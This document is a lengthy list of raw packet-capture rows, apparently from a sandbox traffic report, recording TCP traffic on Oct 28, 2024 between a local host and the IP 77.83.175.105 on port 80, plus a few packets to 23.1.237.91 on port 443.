                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.505218029 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.505249977 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.505265951 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.506395102 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.506407022 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.506458998 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.506927967 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.506938934 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.506983042 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.507916927 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.507926941 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.507972956 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.508807898 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.508820057 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.508863926 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.509996891 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.510009050 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.510018110 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.510036945 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.510063887 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.510848045 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.510859966 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.510905027 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.511885881 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.511898994 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.511908054 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.511944056 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.511979103 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.512844086 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.512855053 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.512906075 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.544492006 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.544544935 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.544691086 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.544702053 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.544740915 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.545629025 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.545639992 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.545671940 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.545698881 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.546405077 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.546416044 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.546452045 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.547298908 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.547310114 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.547359943 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.548357010 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.548368931 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.548409939 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.606765032 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.606825113 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.622899055 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.622980118 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.623059988 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.623070955 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.623112917 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.623986959 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.623996973 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.624041080 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.625040054 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.625051022 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.625092983 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.626056910 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.626069069 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.626077890 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.626112938 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.626128912 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.627213001 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.627224922 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.627233028 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.627265930 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.627286911 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.628073931 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.628093004 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.628118038 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.628134012 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.629156113 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.629167080 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.629209042 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.630189896 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.630202055 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.630211115 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.630244017 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.630259991 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.630985022 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.631032944 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.662307978 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.662403107 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.662445068 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.662456036 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.662497044 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.663391113 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.663403988 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.663445950 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.664321899 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.664333105 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.664371967 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.665461063 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.665471077 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.665504932 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.665529966 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.666547060 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.666558027 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.666598082 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.667675018 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.667685986 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.667694092 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.667725086 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.667742014 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.716099024 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.740490913 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.740564108 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.740804911 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.740818024 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.740854025 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.740871906 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.741647005 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.741658926 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.741802931 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.742522955 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.742533922 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.742575884 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.742604017 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.743588924 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.743599892 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.743608952 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.743629932 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.743647099 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.744654894 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.744667053 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.744709969 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.745599031 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.745609999 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.745649099 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.746650934 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.746664047 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.746721029 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.747693062 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.747704983 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.747733116 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.747761011 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.748680115 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.748692036 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.748725891 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.748740911 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.779750109 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.779818058 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.779946089 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.779954910 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.780004025 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.780564070 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.780574083 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.780622959 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.781558037 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.781569004 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.781615973 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.781646013 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.782586098 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.782598019 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.782605886 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.782644033 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.782675028 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.783373117 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.783382893 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.783461094 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.784393072 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.784404993 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.784452915 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.785531998 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.785542965 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.785590887 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.857625961 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.857714891 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.857853889 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.857870102 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.857908010 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.857939005 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.858809948 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.858864069 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.859011889 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.859064102 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.859505892 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.859518051 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.859565973 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.860552073 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.860563040 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.860593081 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.860622883 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.861620903 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.861633062 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.861675978 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.862623930 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.862634897 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.862642050 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.862685919 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.862719059 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.863660097 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.863672972 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.863681078 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.863712072 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.863739014 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.864687920 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.864698887 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.864738941 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.865823984 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.865834951 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.865890026 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.908286095 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.908351898 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.908620119 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.908632040 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.908663988 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.908698082 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.909481049 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.909492970 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.909549952 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.910490036 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.910504103 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.910557032 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.911685944 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.911699057 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.911746979 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.912558079 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.912570000 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.912616968 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.913575888 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.913587093 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.913621902 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.914702892 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.914714098 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.914722919 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.914762974 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.914798021 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.974980116 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.975054026 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.975218058 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.975229025 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.975295067 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.976135969 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.976147890 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.976192951 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.976226091 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.977080107 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.977091074 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.977098942 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.977164984 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.978050947 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.978060961 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.978081942 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.978112936 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.979140043 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.979151011 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.979192972 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.980161905 CET804970677.83.175.105192.168.2.5
